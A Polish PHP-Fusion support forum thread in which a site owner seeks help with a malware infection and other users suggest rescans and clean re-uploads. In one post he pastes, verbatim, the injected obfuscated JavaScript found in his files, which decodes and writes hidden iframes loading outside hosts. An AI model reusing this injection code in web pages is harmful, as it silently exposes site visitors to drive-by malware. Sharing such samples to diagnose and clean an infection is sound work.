Nawigacja

Aktualnie online

Gości online: 5

Użytkowników online: 0

Łącznie użytkowników: 25,400
Najnowszy użytkownik: AlojzyBartek

Logowanie

Zarejestruj się

Odzyskaj hasło

Shoutbox

Musisz zalogować się, aby móc dodać wiadomość.

Zbigniew@

17.11.2024 11:33:24

Nie ten grzeszy kto pije, ale ten, kto się nie upije.

JazOOn

16.11.2024 20:46:18

tja

Zbigniew@

15.11.2024 18:58:17

Kto pije, ten nie bije.

JazOOn

31.10.2024 20:49:47

Kto pije?

piterus

30.10.2024 19:45:48

I będziemy śpiewać: "Kiedy 20 blisko, przebadaj wszystko, przebadaj wszystko..."

Archiwum shoutboksa

O nie! Ta strona potrzebuje włączonej obsługi języka JavaScript!

Twoja przeglądarka nie obsługuje tego języka lub ma wyłączoną jego obsługę. Włącz wykonywanie kodu JavaScript w swojej przeglądarce internetowej, aby skorzystać ze wszystkich funkcji strony
lub skorzystaj z programu obsługującego język JavaScript, np. Mozilla Firefox, Apple Safari, Opera, Google Chrome lub Windows Internet Explorer w wersji wyższej niż 6.

Zobacz temat

Polski Oficjalny Support PHP-Fusion » PHP-Fusion v5.00-v6.01 Support » Tylko o PHP-Fusion v6.01.xx

Atak malware na stronę
djemate	#1 Dodany dnia 08.07.2008 21:16:49
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Od dwóch dni mam problem z złośliwym robakiem który wkradł się gdzieś w moją stronkę i uniemożliwia mi wejście do panelu administratora. Czytałem już jeden wątek ale niestety po przeskanowaniu plików nie ma żadnego robaka. Podczas wchodzenia w panel administratora pojawia sie komunikat który odnosi się w każdym przypadku (przy wejściu na ankiete itp) do mojego aid: Rozwiń Kod źródłowy `ttp://gks-tychy.pl/administration/articles.php?aid=78#######37#b#b\unp#3##7#5#8 VBS:Malware-gen` (celowo dałem # w miejscu aid i unp). moje pytanie brzmi czy może ten robak siedzieć w bazie danych i dlaczego wyświetla że chodzi o moje aid? nie mam już żadnego pomysłu jak się tego pozbyć. używam avasta. Edytowane przez Pieka dnia 08.07.2008 22:34:40


Wścibski Gość	Dodany dnia 22.11.2024 14:52:33
Pan Kontekstualny Postów: n^x Data rejestracji: Zawsze
IP: localhost

Mysliciel	#2 Dodany dnia 08.07.2008 21:20:20
Przedszkolak Postów: 4 Data rejestracji: 08.07.2008 20:41 ZBANOWANY: Dożywotnio	Witaj, djemate możliwe jest ze jest to robak jakim programem skanowałeś pliki czy bazę tez skanowałeś ? Jaka wersja PF ? EDIT: Nie zauważyłem ze używałeś avasta ! A może spróbuj Kasperskim Lun Nortonem Edytowane przez Mysliciel dnia 08.07.2008 21:21:28 Jeżeli Pomogłem Daj Pomógł !!


djemate	#3 Dodany dnia 08.07.2008 21:29:04
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Skanowałem bazę i nic... Ale po co mam skanować innym antywirusem skoro w internecie wykrywa wirusa to na komputerze tez powinien wykryć wirusa w tych plikach... Edytowane przez piotrek199214 dnia 08.07.2008 21:52:23


piotrek199214	#4 Dodany dnia 08.07.2008 21:51:50
Bywalec Postów: 977 Pomógł: 168 v7.01.05 Data rejestracji: 17.12.2007 21:05	A wpisz w adres przeglądarki: Rozwiń Kod źródłowy `http://gks-tychy.pl/administration/index.php?aid=[color=red]78#######37#b#b[/color]` i wpisz swój aidlink (cerwony kolor). Pomogłem Ci? Wystarczy podziękować i oznaczyć post jako pomocny Tanie tworzenie wtyczek, masz problem napisz.


djemate	#5 Dodany dnia 08.07.2008 21:55:24
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Wtedy samo dopisuje się do linku: Rozwiń Kod źródłowy `\unp#3##7#5#8` i wyswietla się to samo co wcześniej. Edytowane przez piotrek199214 dnia 08.07.2008 22:02:35


piotrek199214	#6 Dodany dnia 08.07.2008 21:58:03
Bywalec Postów: 977 Pomógł: 168 v7.01.05 Data rejestracji: 17.12.2007 21:05	Wejdz w maincore.php i na samym dole sprwadź czy masz to tak samo ten kod: Rozwiń Kod źródłowy `if (iADMIN) { define("iAUTH", substr($userdata['user_password'],16,32)); $aidlink = "?aid=".iAUTH;` Edytowane przez piotrek199214 dnia 08.07.2008 22:04:59 Pomogłem Ci? Wystarczy podziękować i oznaczyć post jako pomocny Tanie tworzenie wtyczek, masz problem napisz.


djemate	#7 Dodany dnia 08.07.2008 22:08:19
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Tak mam dokładnie tak samo. Wykryło mi jeden plik zainfekowany Rozwiń Kod źródłowy `\includes\jscripts\tiny_mce\themes\advanced\docs\ro\index.htm` Końcówka pliku wygląda tak: Rozwiń Kod źródłowy </BODY> </HTML> <!--pw94sjwqo4B1reiwnc--><script type="text/javascript"> function C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072="";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E"); </script> Zobaczyłem również administrations/index.php a tam na samym dole jest: Rozwiń Kod źródłowy </td>\n</tr>\n</table>\n"; closetable(); echo "</td>\n"; require_once BASEDIR."footer.php"; //ke83jcnsWWdo403 echo "<script type=\"text/javascript\">\r\nfunction C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072=\"\";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>"; ?><!-- o --> <script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%31%30%30%20%68%65%69%67%68%74%3D%31%30%30%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> <!-- c --> Czyli też coś nie tak... eh ciekawe gdzie to jeszcze siedzi. Edytowane przez djemate dnia 08.07.2008 22:50:04


proton	#8 Dodany dnia 08.07.2008 22:52:04
Bywalec Postów: 945 Pomógł: 22 Data rejestracji: 10.11.2005 18:29	Najpierw proponuje jeszcze raz na serwer wysłać pliki od PHP-Fusion, nadpisując stare a jak to nie pomoże to musisz sprawdzić czy gdzieś w twoich folderach na serwerze nie ma jakiegoś podjerzanego pliku którego nie ma w podstawowych plikach PHP-Fusion. Zazwyczaj takie pliki są gdzies w katalogu images lub includes ale sprawdź wszystkie foldery. Najlepiej zanim będziesz wysyłać pliki postaraj się wszystkie foldery które możesz usunąć (rozumiem że części jak np. folder z avatarami nie możesz usunąć) Edytowane przez proton dnia 08.07.2008 22:53:51 Strony www Tarnów Sprawozadania, ściągi i materiały na studia Porównanie hostingów


Pieka	#9 Dodany dnia 08.07.2008 22:53:56
Postów: 19882 Pomógł: 767 v7.02.03 Data rejestracji: 23.02.2005 18:12	Kolega przypadkiem nie aktualizowal TinyMCE? Jestem jaki jestem


djemate	#10 Dodany dnia 08.07.2008 22:58:48
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Pieka napisał/a: Kolega przypadkiem nie aktualizowal TinyMCE? Nie aktualizowałem.


Pieka	#11 Dodany dnia 08.07.2008 23:00:05
Postów: 19882 Pomógł: 767 v7.02.03 Data rejestracji: 23.02.2005 18:12	W takim razie do nadpisania dochodzi zapwne na Twoim komputerze. Skanowanie przed Toba. Jestem jaki jestem

Przejdź do forum:

Twój link u nas!

Nawigacja

Główne menu

Komunikacja

Elementarz

Dokumentacja

Aktualnie online

Logowanie

Shoutbox

Zobacz temat